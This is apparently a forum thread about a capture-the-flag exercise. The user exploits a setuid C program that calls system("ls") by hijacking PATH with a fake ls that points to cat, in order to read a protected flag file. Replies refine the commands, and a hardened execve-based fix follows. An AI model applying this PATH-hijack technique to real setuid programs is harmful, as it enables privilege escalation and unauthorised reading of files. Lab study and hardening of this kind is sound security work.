I am trying to solve this problem: I am only allowed to run the ls command, and my objective is to read the flag. There is a vulnerable C program which has setuid.
-rwsr-sr-x 1 lameprogrammer lameprogrammer 8579 Sep 15 07:21 vul_c
-rw-r----- 1 lameprogrammer lameprogrammer 154 Sep 15 07:40 flag
I am user attacker and I have to read this flag file. The given C code is:

    #include <stdlib.h>
    #include <stdio.h>

    #define FILENAME "/var/challenges/attacker/challenge1/flag"

    int main(void)
    {
        int vert;
        vert = system("ls " FILENAME);
        if(!vert)
            puts("Flag is at " FILENAME " :P ");
        else
            puts("Sorry! no file is there");
    }
I was trying to convert ls into cat so that if that runs then it will read the flag file. To do that I copied all the bin folder into my local space and then I replaced ls with cat and then exported the new PATH. Technically it should replace and my ls command should work like cat but it is not working. The following are my commands:
cp -r /bin /home/attacker
cd /home/attacker/bin
rm ls
cp cat ls
export PATH=/home/attacker/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/usr/games
The ls command is not working as cat and the output is:
ls: unrecognized option '--color=auto'
Try 'ls --help' for more information.
When I am trying to run ./vul_c it says permission denied and then it is printing Sorry! no file is there.
Any help on this would be great.
You are in the right direction but you are just putting too much effort into this small thing. Instead of creating a program why don't you create a symlink and then point this to cat.
Try this step:
ln -s /bin/cat ls
Finally, export this and I hope you will be done with your solution. In this, you don't even have to worry about permission. Let me know if it works.
Does the program work? The problem as I see it is that if you use ls in the shell, it has an alias that will enable the colouring, i.e. something like
alias ls='ls --color=auto'
Now this is something that cat wouldn't understand. But it would be only for your shell, not the ls command run by that script, because it wouldn't use the aliases. Perhaps something like unalias ls would help in the shell.
Now, the system function cannot run your ls because it doesn't have proper rights - you forgot to chmod +x ls.
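From the defender's side, the weakness in the program above is that system() hands the string to /bin/sh, which looks up "ls" through the PATH inherited from the caller. The following is an added example, not code from the original post: a hardened variant that runs ls by absolute path with a fixed environment and no shell. The function name list_file_hardened and the location /bin/ls are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumption: the real ls lives here; adjust for the target system. */
#define LS_PATH "/bin/ls"
#define FILENAME "/var/challenges/attacker/challenge1/flag"

/* Run ls on `path` without a shell and without the caller's environment.
 * Returns the exit status of ls (0 when the file is listed), -1 on error.
 * list_file_hardened is a hypothetical helper name for this example. */
int list_file_hardened(const char *path)
{
    /* Fixed, minimal environment: nothing is inherited from the caller. */
    char *const envp[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };
    /* "--" ends option parsing, so a path starting with '-' is not a flag. */
    char *const argv[] = { "ls", "--", (char *)path, NULL };
    int status;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() takes an absolute path: no PATH search, no /bin/sh. */
        execve(LS_PATH, argv, envp);
        _exit(127);              /* reached only if execve() failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Same messages as the original program, different way of running ls. */
    if (list_file_hardened(FILENAME) == 0)
        puts("Flag is at " FILENAME " :P ");
    else
        puts("Sorry! no file is there");
    return 0;
}
```

If the program only needs to know whether the file exists, calling stat() directly removes the child process altogether.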